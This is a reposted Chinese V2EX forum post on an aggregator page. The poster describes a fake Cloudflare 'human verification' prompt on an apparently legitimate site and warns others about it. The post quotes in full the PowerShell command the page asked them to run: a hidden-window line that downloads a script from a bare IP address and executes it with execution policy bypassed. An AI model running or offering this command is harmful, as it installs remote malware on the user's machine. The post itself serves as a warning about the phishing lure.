惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threatpost
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
S
Security Affairs
N
News and Events Feed by Topic
T
Tenable Blog
P
Proofpoint News Feed
W
WeLiveSecurity
Simon Willison's Weblog
Simon Willison's Weblog
Google DeepMind News
Google DeepMind News
C
CERT Recently Published Vulnerability Notes
Help Net Security
Help Net Security
I
Intezer
T
Threat Research - Cisco Blogs
S
Secure Thoughts
C
Cyber Attacks, Cyber Crime and Cyber Security
L
Lohrmann on Cybersecurity
AWS News Blog
AWS News Blog
Google Online Security Blog
Google Online Security Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Know Your Adversary
Know Your Adversary
Project Zero
Project Zero
The Hacker News
The Hacker News
Security Archives - TechRepublic
Security Archives - TechRepublic
T
Tor Project blog
N
News | PayPal Newsroom
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Hacker News - Newest:
Hacker News - Newest: "LLM"
A
Arctic Wolf
Forbes - Security
Forbes - Security
O
OpenAI News
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
Security Latest
Security Latest
P
Palo Alto Networks Blog
S
Schneier on Security
S
Securelist
C
Cybersecurity and Infrastructure Security Agency CISA
H
Heimdal Security Blog
V
Vulnerabilities – Threatpost
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园_首页
T
Troy Hunt's Blog
Latest news
Latest news
Recent Announcements
Recent Announcements
MyScale Blog
MyScale Blog
人人都是产品经理
人人都是产品经理
L
LINUX DO - 热门话题
M
MIT News - Artificial intelligence
N
Netflix TechBlog - Medium
V
Visual Studio Blog
H
Hacker News: Front Page

Cloudflare

爱上 cloudflare 了 - V2EX 我想问问现在 Cloudflare 能不能正常登陆? cfui:基于 go 的 cloudflared web UI 一套能让免费 CloudFlare 建的站部分访问延迟变低(几乎瞬间)的方法,不是优选,夸我或者给我找 bug 为了在 CF 上实现低延迟的效果,打开页面后每半分钟发送一个请求对赛博菩萨有多大伤害?我不想遭报应 Cloudflare 的 5 秒盾/Turnstile 真的无敌吗? CapSolver 这类 api 到底靠不靠谱? https://dash.cloudflare.com 登录不进去 Cloudflare 宣布裁员逾 1100 人 这两天大家能正常登录 cf 吗? cloudflare tunnel 会阻止 openai sdk 的请求,只允许 curl 请求,如何解决 Cloudflare WARP 现在还稳吗 cloudflare worker 懂行的 - V2EX 开启 Cloudflare 的 DNS 代理之后, frp 就无法正常工作 - V2EX cloudflare worker 能指定出口 ip 的国家吗? - V2EX Cloudflare 支持使用自定义域名发邮件了 [送码]做了个 Cloudflare 监控 App - FlareKit,送点兑换码 - V2EX 转移到 Cloudflare Registrar 的域名疑似被盗 为什么已经把 cloudflare 上的 Cache Rules 设置为绕过缓存,还是会被限制上传大小? vibe 了一个 gotify/server 的 cloudflare worker 版本 - V2EX 求助: cf 上面的域名被封了 - V2EX 被 CF 拦截了部分页面, Error 451 错误 - V2EX CF 的 ai 反爬 robots.txt 似乎部分情况下跟 Pages 机制冲突? Cloudflare 收购了 Astro - V2EX 最近发现 CF WARP 在 Win & Linux 上国内能直连,安卓不行 - V2EX Cloudflare Radar《2025 年度回顾》,挺有意思 - V2EX 白嫖 worker AI 的进 - V2EX 刚注册的新域名放到了 cloudflare 一周后发现访问量逐渐增加,是爬虫吗 - V2EX 历时 20 多天, Cloudflare 弄丢的数据找回来了 - V2EX cloudflare worker 直连访问太慢了,求个替代 - V2EX 难道没人觉得 cloudflare 改版后,很难用吗? - V2EX Cloudflare 发表 12/5 的故障报告 - V2EX cloudflare 年度总结来了 - V2EX Cloudflare DNS 解析策略 请问 cloudflare 计费最近是不是出了问题?扣了我 5 美元的 workers 会员费, paypal 有扣费记录,也有发票,结果显示我还是免费计划 请教访问 Cloudflare Dashboard 的正确方式 - V2EX 我,吃饱了撑的注册了个域名, Cloudflare 账号没了,不建议将域名放在 Cloudflare - V2EX 听说 cloudflare tunnel 可以通过第二个域名和 ip 优选搞访问加速,有人做过吗?效果怎么样? - V2EX 想要开通 cf 的付费策略,但是苦于没有外币卡 - V2EX cloudflare workers 搭建的博客速度慢怎么优化 - V2EX 尝试复现 Cloudflare 2025-11-18 的故障 - V2EX (求助) 如何隐藏 OSS 报错信息中的 Bucket 域名 - V2EX 使用 CloudFlare,如何彻底不使用他的 https? - V2EX 这次 Cloudflare 宕机一个有趣的点 - V2EX 移动、电信、联通的固定家庭宽带,访问 Cloudflare 得到是美国的 CDN 节点(跨越整个太平洋)? 而不是中国周边如:首尔、东京、香港 这样的延迟低的节点? - V2EX Cloudflare 怎么给人一种草台班子的感觉? - V2EX cloudflare 全球挂了?? - V2EX cloudflare 炸了? - V2EX 大佬们有没有遇到过 Cloudflare 续订域名 504?换了好几个卡都不行, Paypal 也尝试了 - V2EX cloudflare 域名解析错误问题 - V2EX Worker 的 Editor 贴入代码后怎么总是失去格式,全部连成一条 - V2EX 问题总结 & 解决经验 | Cloudflare R2 og:image 跨域抓取失败 - V2EX tunnel 出错! 默认 cloudflare 不对网站做防护吗? - V2EX cloudflare 的 page 能绑定根域名吗 - V2EX 难以缓存的动态页面用免费 Cloudflare 服务器放在那里更快?用 CF 主要是为了防 DDoS。 Cloudflare 各个计划多少流量以下不会被客服催着买更高的计划? 我发现 cloudflare 用多了之后, 我所有的规划都想往上靠 - V2EX 网站上 cloudflare 之后的奇怪流量都是哪里来的 被 CF block 了账户,何解? Workers 额度超了导致静态站点报错 1027 - V2EX cf 买的域名竟然不支持改 NS 写了个小工具,免费中转 Gemini API Nginx 反向代理 CLoudflare 的 Pages 项目域名出错
碰到了伪装 Cloudflare 钓鱼验证,差点中招 - V2EX
liyafe1997 · 2025-11-25 · via Cloudflare

liyafe1997

 

liyafe1997 · 2025 年 11 月 25 日 · 1817 次点击

这是一个创建于 201 天前的主题,其中的信息可能已经有所发展或是发生改变。

让我执行的命令

powershell -w h -c "$u='http://83.217.209.227/2UP.lim';$p=\"$env:USERPROFILE\Music\d.ps1\";(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"

我还想着 CF 什么时候这么狠了,居然让用户执行 Shell 验证(第一反应以为是想让用户通过 Shell 往服务器上 POST 一些东西来证明不是 robot ),看到这里面的 URL 居然直接用 IP 地址而且没有 https ,还好多了个心眼。

想看看这脚本到底是啥,直接打开上面那个 URL 被卡巴斯基拦截了。

不过现在好像已经 404 了,不知道是不是会判断 UA 啥的,用浏览器打开就 404 。

关键是,这理应是个正规站(所以一开始我心理没设防),难道是被黑了?